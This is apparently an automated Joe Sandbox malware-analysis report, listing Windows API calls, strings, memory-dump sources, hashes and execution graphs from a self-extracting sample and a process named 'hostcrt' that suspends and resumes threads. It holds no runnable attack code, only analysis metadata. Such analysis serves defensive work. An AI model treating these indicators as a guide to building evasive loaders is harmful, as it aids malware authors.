                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CCA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CE91E0,?,00000000,?,00000001,?,?,00000001,00CE91E0,?), ref: 00CEC9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CECA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CE6CBE,?), ref: 00CECA70
                                                            • __freea.LIBCMT ref: 00CECA79
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00CDA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CDA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CDA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00CDA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            APIs
                                                              • Part of subcall function 00CDA699: GetDC.USER32(00000000), ref: 00CDA69D
                                                              • Part of subcall function 00CDA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CDA6A8
                                                              • Part of subcall function 00CDA699: ReleaseDC.USER32(00000000,00000000), ref: 00CDA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00CDA83C
                                                              • Part of subcall function 00CDAAC9: GetDC.USER32(00000000), ref: 00CDAAD2
                                                              • Part of subcall function 00CDAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CDAB01
                                                              • Part of subcall function 00CDAAC9: ReleaseDC.USER32(00000000,?), ref: 00CDAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC75E3
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                              • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC777F
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                            • Instruction ID: c638ec9dc1e7bee442f45cd3c7af10860d71cc1e18af2e116dc808a77c566db6
                                                            • Opcode Fuzzy Hash: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                            • Instruction Fuzzy Hash: 95416F71800158AAEB25EB64CD5AFEEB378EF45300F00819AF609A7192DB745F85DF71
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                            • Instruction ID: df0fc782a0b8b11589a5078f27756ba98f7192f771efef5ce8a5a7891151139a
                                                            • Opcode Fuzzy Hash: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                            • Instruction Fuzzy Hash: BE21D17290434A9AD731EA64E845F6BB3ECDF91750F02042BF744C3341FB64AE4893A2
                                                            APIs
                                                              • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                              • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00CCF33E), ref: 00CCF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 00CCF389
                                                            • CryptUnprotectMemory failed, xrefs: 00CCF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: b60648bbac8c28dbbc953fac4b7ce7a1d2ecf76092cbcf1dc266e1e3d67b9f0c
                                                            • Instruction ID: 4b7cefbfa6cd8862c78db8bc376378448b77ab4cb029b99b7040708834df9d70
                                                            • Opcode Fuzzy Hash: b60648bbac8c28dbbc953fac4b7ce7a1d2ecf76092cbcf1dc266e1e3d67b9f0c
                                                            • Instruction Fuzzy Hash: A3110331A007A9BBEF119B21DC45F6E3B56FF04720B08416EFC559B2A1DA709E0296A2
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CCB9B8
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 5e18e7c3a3a1786d52f822c99266d5c0d9b2095f8381ceaf8c8f7cf4216217c7
                                                            • Instruction ID: 2d5fc86bec372f8e1035436abe26daaed0fdf2f36071d77ff3a511c646feda25
                                                            • Opcode Fuzzy Hash: 5e18e7c3a3a1786d52f822c99266d5c0d9b2095f8381ceaf8c8f7cf4216217c7
                                                            • Instruction Fuzzy Hash: B501D263500351A99A346BA6CC87E6BA7ACEE91770F40841EF599D7082EB30DD4092B1
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00CD1160,?,00000000,00000000), ref: 00CD1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00CD108A
                                                              • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: e5934255b618eb76e084f9bd78e22cf478d54a3f3a34baa2e3a4a1a91eec08e0
                                                            • Instruction ID: 97df4a88994c7d4a28464b8da6e808a5c9613c0f53dbb3127b493d5bd7711cf1
                                                            • Opcode Fuzzy Hash: e5934255b618eb76e084f9bd78e22cf478d54a3f3a34baa2e3a4a1a91eec08e0
                                                            • Instruction Fuzzy Hash: 4101A2B93443497BD3346E64ED51F7A7398EB41751F24002FFA8692380CAE168858625
                                                            APIs
                                                              • Part of subcall function 00CCE2E8: _swprintf.LIBCMT ref: 00CCE30E
                                                              • Part of subcall function 00CCE2E8: _strlen.LIBCMT ref: 00CCE32F
                                                              • Part of subcall function 00CCE2E8: SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                              • Part of subcall function 00CCE2E8: GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                              • Part of subcall function 00CCE2E8: GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                            • SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                            • Instruction ID: 968b01009f00042b7a95640bf549a54c323b3d9b6307ea98a4ba58ea4b1fa4d0
                                                            • Opcode Fuzzy Hash: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                            • Instruction Fuzzy Hash: C9F036301043C8A6EF155F51CC0DFA93B599B5634DF0C4119FD58955A2C778CA91AA70
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00CD1206,?), ref: 00CD0FEA
                                                            • GetLastError.KERNEL32(?), ref: 00CD0FF6
                                                              • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CD0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: e8646f30f7d125d4b20c201628b8d2fea6057a8f5c77feb47ea3286087b99d82
                                                            • Instruction ID: a54e194efadc6537bb13b07daf504ea169e1568b874fa844cf7a1086cc1482b8
                                                            • Opcode Fuzzy Hash: e8646f30f7d125d4b20c201628b8d2fea6057a8f5c77feb47ea3286087b99d82
                                                            • Instruction Fuzzy Hash: 16D05B7150456477C6103324AD05FBF39049B12731B54472AF579552F5CE154AC19697
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00CCDA55,?), ref: 00CCE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CCDA55,?), ref: 00CCE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                            • Instruction ID: 66bd738cbe5644ada963358f16c51e3f6c7f2713c914d702ae9c4e772cd5cf5c
                                                            • Opcode Fuzzy Hash: d3ca4dd5ae9be58e76d1d46c887f0b4bce81126f49671a338c665db369724f27
                                                            • Instruction Fuzzy Hash: 34C0803124079076E73037757C0DF576E585B01B11F05045DF641E91D1DEE5C540C7E1

                                                            Execution Graph

                                                            Execution Coverage:4.5%
                                                            Dynamic/Decrypted Code Coverage:33.3%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph 22066 7ffd9bc6d6bd 22067 7ffd9bc6d6cb SuspendThread 22066->22067 22069 7ffd9bc6d7a4 22067->22069 22070 7ffd9bc6edfc 22071 7ffd9bc6ee33 ResumeThread 22070->22071 22073 7ffd9bc6ef04 22071->22073 22062 7ffd9bc6ef59 22063 7ffd9bc6ef67 FindCloseChangeNotification 22062->22063 22065 7ffd9bc6f044 22063->22065 22058 7ffd9bc70ba5 22059 7ffd9bc70bbf GetFileAttributesW 22058->22059 22061 7ffd9bc70c85 22059->22061
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86f0abc37fac186a41e4243050df4ed8da6a3919c3713abc2a251da545c37c46
                                                            • Instruction ID: ecd3afc0c26a51ec82e24cf6ab886140fcddd8c9384b2f9de19ec56992485469
                                                            • Opcode Fuzzy Hash: 86f0abc37fac186a41e4243050df4ed8da6a3919c3713abc2a251da545c37c46
                                                            • Instruction Fuzzy Hash: 83A17C71A19A8D8FE7A9DB68C8657A97BF1FF59314F0102BAD009D72D6CBB42801CB40

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9
                                                            • API String ID: 0-3254877420
                                                            • Opcode ID: af6d95d4c526b924f7415ceca3a264e006e7bb13e1e04ad53300c5ceb5f1ba91
                                                            • Instruction ID: 654086f52e8ed77b8993f3478602a336455dc59e3cedd3547033886513852f0e
                                                            • Opcode Fuzzy Hash: af6d95d4c526b924f7415ceca3a264e006e7bb13e1e04ad53300c5ceb5f1ba91
                                                            • Instruction Fuzzy Hash: 7D11AC32A2964D8FCB44EF2CE8515E9B7A0FB95324B0103AAE849D3261D730A965CBC1

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 15015a10b6ca3b1dd6ed5cd26d5d237adf2ce05e32c1ceb83de293a74d5cb689
                                                            • Instruction ID: 5c469610fe09e76c7bfa6cf494cf6b924304e9081e7e2fd8a056dca81a755329
                                                            • Opcode Fuzzy Hash: 15015a10b6ca3b1dd6ed5cd26d5d237adf2ce05e32c1ceb83de293a74d5cb689
                                                            • Instruction Fuzzy Hash: 2A517A7090D78D8FDB55DFA8C854AE9BFF0EF1A310F1441ABD049DB292DA389886CB11

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: ba9d2fd092359a6d85d2f4a622d59af0c0585d047537b22bf229d9a7598f0ad3
                                                            • Instruction ID: f28005a8ed3a11149279f2720b069f138e8f0d77078e525a18fd20d40eb2ff3a
                                                            • Opcode Fuzzy Hash: ba9d2fd092359a6d85d2f4a622d59af0c0585d047537b22bf229d9a7598f0ad3
                                                            • Instruction Fuzzy Hash: D8416D30D0865D8FDB58DFA8D894BEDBBF0EF1A310F1041AAD049D7292DA349885CB01

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 7ffd9bc6d6bd-7ffd9bc6d6c9 28 7ffd9bc6d6d4-7ffd9bc6d7a2 SuspendThread 27->28 29 7ffd9bc6d6cb-7ffd9bc6d6d3 27->29 33 7ffd9bc6d7a4 28->33 34 7ffd9bc6d7aa-7ffd9bc6d7f4 28->34 29->28 33->34
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: SuspendThread
                                                            • String ID:
                                                            • API String ID: 3178671153-0
                                                            • Opcode ID: b37b5f5de481b4629cbc31b68b6ecad28ec119321c214995d6cb9faf0ea2723a
                                                            • Instruction ID: 042375073d22e92f4b76e862c3507f45482c38900bfaf619db61d019ed9f4be8
                                                            • Opcode Fuzzy Hash: b37b5f5de481b4629cbc31b68b6ecad28ec119321c214995d6cb9faf0ea2723a
                                                            • Instruction Fuzzy Hash: 51414A70E0864D8FDB58DFA8D899AEDBBF0FB5A310F10416AD049E7296DA70A845CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 37 7ffd9bc70ba5-7ffd9bc70c83 GetFileAttributesW 41 7ffd9bc70c8b-7ffd9bc70cc9 37->41 42 7ffd9bc70c85 37->42 42->41
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826375663.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bc60000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 00b62097e86915652eb2d2914d097edd40bbc9d04b53a109c5bfc13047177b3d
                                                            • Instruction ID: fddab31f820f2de3f8e3361ad54a45fb444b1f0b775f0fddc17225f29e018272
                                                            • Opcode Fuzzy Hash: 00b62097e86915652eb2d2914d097edd40bbc9d04b53a109c5bfc13047177b3d
                                                            • Instruction Fuzzy Hash: 8041F870E08A1C8FDB98DF98D895AEDBBF0FB59310F10416AD049E7251DA71A885CF41

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: a6caba59541b1ad9c29bbd82daa29fdaf2952bf1872f2a07a84434cb67443449
                                                            • Instruction ID: 1616a04015d8fe775aa6da6f6cdf22118bbc0cbf87e1b5fcf3ca30c3566ed137
                                                            • Opcode Fuzzy Hash: a6caba59541b1ad9c29bbd82daa29fdaf2952bf1872f2a07a84434cb67443449
                                                            • Instruction Fuzzy Hash: 95517272E4854E8FDB68EB98C4A15FDB7B1FF59380F1041BAE01AE7282CA346905CB44

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 691ee40fd35d7e92cf45fdb1ab988d0ac5407be2ed5bbcfbeb14af8eac0e7ff3
                                                            • Instruction ID: 1e98e0d5e183bd3dd1bd896e1fefec69f592e79bed99a3bb6347888a5f2e21b5
                                                            • Opcode Fuzzy Hash: 691ee40fd35d7e92cf45fdb1ab988d0ac5407be2ed5bbcfbeb14af8eac0e7ff3
                                                            • Instruction Fuzzy Hash: 3C414831E4861E8FDB69EBE4C4A55BDB7B1FF59304F1040BEE01AA7296CE386901CB04

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 107 7ffd9bd139ff-7ffd9bd13a01 108 7ffd9bd13a62 107->108 109 7ffd9bd13a03-7ffd9bd13a1e 107->109 110 7ffd9bd13a64 108->110 109->108 112 7ffd9bd13a6f-7ffd9bd13b56 110->112 122 7ffd9bd13b57 112->122 122->122
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826966376.00007FFD9BD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bd10000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e
                                                            • API String ID: 0-4024072794
                                                            • Opcode ID: 78a9dc4d1ce84b2a90cbfd0c4877b0bb78275d3a38fe167cb256c0ea2480c52b
                                                            • Instruction ID: a9a49850c33fdb1de61ea25110cee17ad034507a22e1267f9039033f4c817bfa
                                                            • Opcode Fuzzy Hash: 78a9dc4d1ce84b2a90cbfd0c4877b0bb78275d3a38fe167cb256c0ea2480c52b
                                                            • Instruction Fuzzy Hash: 9B316171A1DA4E8FDB6CEB48C8A1D68B7E1FF58314F0511F9E00DD7292DA34A981CB42

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
